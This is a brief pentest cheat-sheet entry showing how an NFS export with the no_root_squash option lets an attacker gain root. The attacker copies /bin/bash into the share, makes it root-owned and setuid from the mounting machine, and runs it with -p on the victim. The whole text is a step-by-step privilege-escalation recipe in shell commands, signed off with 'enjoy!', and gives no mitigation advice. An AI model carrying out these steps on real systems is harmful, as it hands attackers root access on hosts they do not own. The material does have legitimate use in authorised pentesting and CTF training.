NFS no_root_squash
Overview #
If an NFS export contains no_root_squash
option, attacker can mount that export on his machine and modify any file acting as root user.
Steps #
- Mount share on attacker machine
- Inside victim machine, copy
/bin/bash
# e.g /home/james is an NFS export
cd /home/james
cp /bin/bash .
- From attacker machine
cd /mnt
sudo chown root:root bash
sudo chmod u+s bash
- Back to victim machine,
./bash -p
# enjoy!